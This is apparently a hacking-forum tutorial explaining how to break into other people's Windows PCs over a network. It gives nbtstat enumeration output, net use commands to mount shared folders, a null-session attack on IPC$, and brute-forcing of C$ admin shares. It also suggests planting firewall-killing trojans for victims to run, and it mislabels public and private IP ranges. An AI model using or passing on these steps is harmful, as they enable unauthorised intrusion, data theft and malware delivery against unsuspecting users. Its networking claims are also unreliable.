Enter InTo Anothers PC And Share Data

If your Public IP(shown on tracemyip.com) is 169.xxx.xxx.xxx,then if you use this in the nbtstat command then you will get the statement "Host not found"


If your private IP(actual IP) is 69.xxx.xxx.xxx then you can use this innbtstat command

Usage:

nbtstat -A 69.xxx.xxx.xxx


Now you will get the result as below:

NetBIOS Remote Machine Name Table

Name Type Status
--------------------------------------------
BXCGGDKHSVVCHG6<00> UNIQUE Registered
MSHOME <00> GROUP Registered
MSHOME <1e> GROUP Registered
MSHOME <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-00-6C-9E-CE-5D 


Now this pc doesnt have sharing enabled

If the pc has sharing enabled,the the result would be as below:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------
BXCGGDKHSVVCHG6<00> UNIQUE Registered
BXCGGDKHSVVCHG6<20> UNIQUE Registered
MSHOME <00> GROUP Registered
MSHOME <1e> GROUP Registered
MSHOME <1d> UNIQUE Registered
..__MSBROWSE__.<01> GROUP Registered

MAC Address = 00-00-6C-9E-CE-5D


Now this is a pc with file and printer sharing enabled ..Look at hex code<20>..this means that the file and printer sharing is enabled on that pc! Good sign!


Now make a scan within you Private IP range..if you find any alive hosts,note the ips and use them in the nbtstat command..

If you find sharing enabled on those pcs then use these commands:
To enter a target pc with sharing enabled,just follow these steps mentioned below:

Run cmd
type:
net use k: \\xxx.xxx.xxx.xxx\SharedDocs (Put the ip of the target pc which is in ur network)

now it will show "The command completed successfully!"

Now open My computer,find the drive named K:\ and the open it..this is the shareddocuments folder of the target pc.....enjoy browsing,copying stuff and uploading files,etc

If you are not happy with the sharedDocuments,and wanna hack into the root drive of the target system,then follow these simple steps mentioned below:

run cmd
type:
net use \\xxx.xxx.xxx.xxx\IPC$ "" /u:"" to establish a null session!

now to finally get into the root of the target pc,type:
net use m: \\xxx.xxx.xxx.xxx\C$ "" /u:"" 

Now it will prompt you to provide username and password..try guessing orbruteforcing..finally when you get the username and password,use those to enter into the system..thats it!!

Sounds simple!! isnt it??

yeah..but if there is a firewall problem then bypass/disable that firewall using the software mentioned by me with procedure in my first few queries..The software is Firekill Firewallkiller 2000.Its a CLI based software...try using this or leave simple firewall killer trojans in the shared documents folder and wait for the target to execute them!!